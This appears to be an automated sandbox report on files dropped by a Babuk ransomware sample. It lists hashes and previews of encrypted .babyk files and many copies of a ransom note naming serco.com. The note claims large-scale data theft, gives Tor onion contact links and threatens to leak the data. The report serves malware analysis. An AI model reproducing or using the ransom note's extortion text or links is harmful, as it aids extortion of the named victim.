                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.533503881484169
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlAjx5wMxa5RdyRMjKfOpXRNnEJj8CLgliCQzF5im7UK0QmUxNvEEn:wjvYbyq2fOpLnEtTLgliCQzF5r7UK0BI
                                                                            MD5:29B7B6693439B610630D369C46E9C304
                                                                            SHA1:D3009E274BF094381469FB0B0F7199730E91E9FC
                                                                            SHA-256:2990DFFBF3F179A2E1FAE13CAB23C6B176A8673A8AAC30285C31CB6CCA4DDE2F
                                                                            SHA-512:37CD5B251580362D93A14191B1A6A65E231B5B8B33AA338CF5622D84ED089F585CBA005F7CD66B7AE833D946E593EF71EFD8F2EAB4457F6E31E568977A76929B
                                                                            Malicious:false
                                                                            Preview: .....C.FT.\...$"......r...#.i....4....NE../....|.........[.l..g.)...J.DF.O...o.../0....f...^.F....;...lC.$......`z..-...[V.h....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.977978526119467
                                                                            Encrypted:false
                                                                            SSDEEP:192:qPeHRY7qb3XG78ZTfP0IVPjtuimvPQKQJNYhQnKf:q2xY7qb3XS8B9VPpuLI7JNrKf
                                                                            MD5:7C5B6C77AB6541D50CE393E78DF543AE
                                                                            SHA1:45A16EDFC9CD32693026ECDB1A5D8B15DBD9F2E7
                                                                            SHA-256:224D4BDC8A394AE71C1F00584DBE5BAE0B5E1233C6339F386613629CBD79A0AE
                                                                            SHA-512:F4AE24038B52A9496ECFF73F9A1C23677301A8C679896E023D3412DC0A76C44480CCE0C483BFDA8D4BE95FEB9E07B94F2F9A77DEB50B9F05A21CE224C4743CCB
                                                                            Malicious:false
                                                                            Preview: w.!...I.../.................*....n..V/L..w{.y....5...y..IkK.tl...........C....n...'...;Y..#.NW$...].|!(.7=............6...i....wy._.LE.....<H...yK..% $I.]`1.".ltX................ ....Z....v...p......&W..>+.E.o....A....[..3Z/.^...M..3...?0!%.7.#..evWwJ!...~.....4..ke.8 $...4.b...9w....N....k...Ksw..;...i/|.g>.;.A.*q.(k...l.Z..C..{....Z..'d...sm;5.[.......4.}...(...5.|.t..J...ey<.......X)|..kT..UF.-K?..&$...`.3N..?.n..o.\.....F...K.+@..#B.E6.J9.U........*...'.%.6.......Y`.............X.r.1....?*..Z d..A.M%{9...U.J"d..._/l..O..<....5Ebx..B.71AXQv..#..<7.......&..4./.......n..SnT....9r.....W..,.....s4..?....6iK6.;...b.....A....S..E...s...[.......o...:.Sv$..P..B,.3.sc.d,.....GR....>}...cJ.\?....)m%...I..v).U4yvu.0...>.d{5..X...a({Dw.(e.UZ.......n..i..y.C.na.G...tj!.Fr...).T.....47RDLE.!.G@..#O.0m.....[,Lh.....@......]F..j..e..*|......86+.iE.b...A-m..*.{..yf.}g|[.....G_C..C.J..l.Ki..Y...7......"}..eibI........{'..0.s..[.4=..`..iL9?'..(..Q....2.
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.605431578145514
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlGlcy044Y4FHyULo1iucDPVXnUqDhGOQ0QigTx16fXr75MRWR8l/8LUxNvEEn:S04PQk1NcxXz9AigTA7+8y/8L0vtn
                                                                            MD5:1ACE362A1C43D5E35ABE868820C1443F
                                                                            SHA1:0E104CE6B835B873FE5364A400A7A1E0BDD6FB5B
                                                                            SHA-256:531C753CF9D744E3A4138B8205A264115735A22F7F306ECF1E7A4953B50AFA88
                                                                            SHA-512:BB9432AA62485E70A5A088598B6A82DEEA04E1DAD5EC48D467FBBFC37093949F19F0DE91B37629870034EBC77CEA5E527DEA69142B9EE4EF54DB5AA9BE640C3B
                                                                            Malicious:false
                                                                            Preview: ........PV...'...]...x...#........B....;.P......9f*....W....O.Dc..3v...Q..G..P.(.k.K.p_.TXC....3.Lr.S..............,2.o...`......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.9822719054544935
                                                                            Encrypted:false
